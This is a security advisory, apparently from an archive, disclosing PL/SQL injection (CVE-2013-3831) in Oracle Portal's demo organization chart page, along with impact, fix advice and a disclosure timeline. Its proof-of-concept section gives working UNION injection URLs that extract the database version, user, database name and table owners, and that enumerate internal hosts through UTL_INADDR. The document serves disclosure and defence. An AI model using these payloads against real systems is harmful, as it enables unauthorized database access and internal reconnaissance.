seeing is believing

Oracle Portal Demo Organization Chart PL/SQL Injection

Oracle Portal Demo Organization Chart PL/SQL Injection
Posted Oct 17, 2013
Authored by Manuel Garcia Cardenas | Site isecauditors.com

Oracle Portal Demo Organization Chart suffers from multiple remote PL/SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2013-3831
MD5 | b9a29359a5f067565efbbee9f0981e2d

Oracle Portal Demo Organization Chart PL/SQL Injection

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2012-001
- Original release date: November 8th, 2012
- Last revised: March 20th, 2013
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2013-3831
=============================================

I. VULNERABILITY
-------------------------
PL/SQL Injection in Oracle Portal Demo Organization Chart

II. BACKGROUND
-------------------------
Web Organization Chart (Ora Version) is used to connect to the Oracle
database. Ora version of "Web Organization Chart" selects information
from the Oracle

(HR) tables and converts it into a format that is readable for the
Orgchart software.

III. DESCRIPTION
-------------------------
This bug was found using the demo portal PORTAL_DEMO.ORG_CHART.SHOW. To
exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to

interact with the application. It is possible to inject SQL code in the
variable "p_arg_values".

IV. PROOF OF CONCEPT
-------------------------
*** SQL Injection ***

Version:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union

+select+banner,null,null,null,null+from+v$version--

User:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union

+select+user,null,null,null,null+from+dual--

Actual Database:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union

+select+global_name,null,null,null,null+from+global_name--

Lists of Databases:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union

+select+owner,null,null,null,null+from+all_tables--

*** PL/SQL Injection ***

For example, using the function UTL_INADDR.get_host_address we can found
the internal address:

/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union

+select+UTL_INADDR.get_host_address,null,null,null,null+from+dual--

Using a bruteforce attack on the range obtained and the function
UTL_INADDR.get_host_name(), we can acquire a list of internal hosts:

/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?

p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value

%27union+select+UTL_INADDR.get_host_name('INTERNALs-IP'),null,null,null,null+from+dual--

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete

compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Demo Page of Oracle Portal Demo Organization Chart.

VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.

VIII. REFERENCES
-------------------------
http://www.oracle.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by Manuel García Cárdenas
(mgarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December 02, 2012: Initial release to Oracle.
February 20, 2013: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
October 25, 2012: The vulnerability is discovered.
December 2, 2012: Initial release to Oracle.
February 20, 2013: Vulnerability already corrected but will
not be included in CPUs. Credits in CPUApr2013.
October 11, 2013: The following issue reported is fixed in
the upcoming Critical Patch Update

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Internet
Security

Auditors accepts no responsibility for any damage caused by the use or
misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and

assessing. Our clients include some of the largest companies in areas
such as finance, telecommunications, insurance, ITC, etc. We are vendor
independent

provider with a deep expertise since 2001. Our efforts in R&D include
vulnerability research, open security project collaboration and
whitepapers,

presentations and security events participation and promotion. For
further information regarding our security services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close